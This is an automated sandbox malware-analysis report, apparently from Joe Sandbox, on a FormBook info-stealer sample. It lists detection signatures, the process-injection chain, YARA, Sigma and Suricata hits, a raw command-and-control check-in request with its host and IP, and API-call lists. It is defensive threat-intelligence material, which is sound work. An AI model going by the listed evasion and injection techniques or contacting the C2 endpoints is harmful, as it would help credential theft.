Edit tour

Windows Analysis Report
6SN0DJ38zZ.exe

Overview

General Information

Sample name:	6SN0DJ38zZ.exe renamed because original name is a hash value
Original sample name:	c0c3a82789a704a5ed3e165d9c61da76.exe
Analysis ID:	1574644
MD5:	c0c3a82789a704a5ed3e165d9c61da76
SHA1:	5e36e1c449a25ddff1d10100e2ae205633334aad
SHA256:	f56bfc8fdaa505f1fedd6aab5e27bc739d5c92a93c315dece4113ea40bd9bc8b
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Sigma detected: Xwizard DLL Sideloading

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

6SN0DJ38zZ.exe (PID: 6008 cmdline: "C:\Users\user\Desktop\6SN0DJ38zZ.exe" MD5: C0C3A82789A704A5ED3E165D9C61DA76)

svchost.exe (PID: 5828 cmdline: "C:\Users\user\Desktop\6SN0DJ38zZ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

gmbrlAYBeQOw.exe (PID: 1768 cmdline: "C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

xwizard.exe (PID: 1272 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)

gmbrlAYBeQOw.exe (PID: 524 cmdline: "C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7096 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
7.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Xwizard DLL Sideloading

Source: Process started

Author: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe" , ParentImage: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe, ParentProcessId: 1768, ParentProcessName: gmbrlAYBeQOw.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 1272, ProcessName: xwizard.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", CommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", ParentImage: C:\Users\user\Desktop\6SN0DJ38zZ.exe, ParentProcessId: 6008, ParentProcessName: 6SN0DJ38zZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", ProcessId: 5828, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", CommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", ParentImage: C:\Users\user\Desktop\6SN0DJ38zZ.exe, ParentProcessId: 6008, ParentProcessName: 6SN0DJ38zZ.exe, ProcessCommandLine: "C:\Users\user\Desktop\6SN0DJ38zZ.exe", ProcessId: 5828, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T13:39:19.556542+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49805	103.23.149.28	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 6SN0DJ38zZ.exe

Joe Sandbox ML: detected

Source: 6SN0DJ38zZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gmbrlAYBeQOw.exe, 0000000A.00000000.1612130154.000000000073E000.00000002.00000001.01000000.00000005.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000000.1762645537.000000000073E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 6SN0DJ38zZ.exe, 00000000.00000003.1283812999.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, 6SN0DJ38zZ.exe, 00000000.00000003.1286063878.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1596141207.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1593992766.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1692154968.0000000004B07000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004FFE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1694117014.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 6SN0DJ38zZ.exe, 00000000.00000003.1283812999.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, 6SN0DJ38zZ.exe, 00000000.00000003.1286063878.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1596141207.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1593992766.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1691164120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1692154968.0000000004B07000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004FFE000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2012509338.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1694117014.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xwizard.pdb source: svchost.exe, 00000007.00000002.1690923576.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1659707171.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000003.1631333327.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122529177.0000000000C58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: xwizard.exe, 0000000B.00000002.2012848356.000000000548C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.0000000003266000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3123382739.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3120776782.000000000247C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: xwizard.exe, 0000000B.00000002.2012848356.000000000548C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.0000000003266000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3123382739.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3120776782.000000000247C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: xwizard.pdbGCTL source: svchost.exe, 00000007.00000002.1690923576.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1659707171.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000003.1631333327.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122529177.0000000000C58000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009E445A
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EC6D1 FindFirstFileW,FindClose,	0_2_009EC6D1
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_009EC75C
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EEF95
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_009EF0F2
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EF3F3
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E37EF
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_009E3B12
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_009EBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49805 -> 103.23.149.28:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_009F22EE

Source: global traffic

HTTP traffic detected: GET /jv64/?9XzpA=vNkxGXa&CfV=0rgj4Y9sgnjazUN/65XyfxBpTrrNkBjNZTVEPCZk5UU8x8xERo30l5WFjW3xVEpqAaMpb+WWzoUct0TX0HY75fQ4vaKwo5APNhg+4dJ1BHUS+Ec5quFNf0FyqqAWs9oIcQLGwWPPCUJQ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.y6h6kn.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0

Source: global traffic

DNS traffic detected: DNS query: www.y6h6kn.top

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Dec 2024 12:39:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "674427dd-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: xwizard.exe, 0000000B.00000002.2011770256.0000000003282000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: xwizard.exe, 0000000B.00000003.1934621643.0000000007FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009F4164

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_009F4164

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_009F3F66

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_009E001C

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00A0CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00A0CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00983B3A
Source: 6SN0DJ38zZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 6SN0DJ38zZ.exe, 00000000.00000000.1250157470.0000000000A34000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_264986ee-2
Source: 6SN0DJ38zZ.exe, 00000000.00000000.1250157470.0000000000A34000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_1040e5f6-8
Source: 6SN0DJ38zZ.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_520420a4-6
Source: 6SN0DJ38zZ.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a14504c4-f

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042C643 NtClose,	7_2_0042C643
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472B60 NtClose,LdrInitializeThunk,	7_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034735C0 NtCreateMutant,LdrInitializeThunk,	7_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03474340 NtSetContextThread,	7_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03474650 NtSuspendThread,	7_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472BE0 NtQueryValueKey,	7_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472BF0 NtAllocateVirtualMemory,	7_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472B80 NtQueryInformationFile,	7_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472BA0 NtEnumerateValueKey,	7_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472AD0 NtReadFile,	7_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472AF0 NtWriteFile,	7_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472AB0 NtWaitForSingleObject,	7_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472F60 NtCreateProcessEx,	7_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472F30 NtCreateSection,	7_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472FE0 NtCreateFile,	7_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472F90 NtProtectVirtualMemory,	7_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472FA0 NtQuerySection,	7_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472FB0 NtResumeThread,	7_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472E30 NtWriteVirtualMemory,	7_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472EE0 NtQueueApcThread,	7_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472E80 NtReadVirtualMemory,	7_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472EA0 NtAdjustPrivilegesToken,	7_2_03472EA0
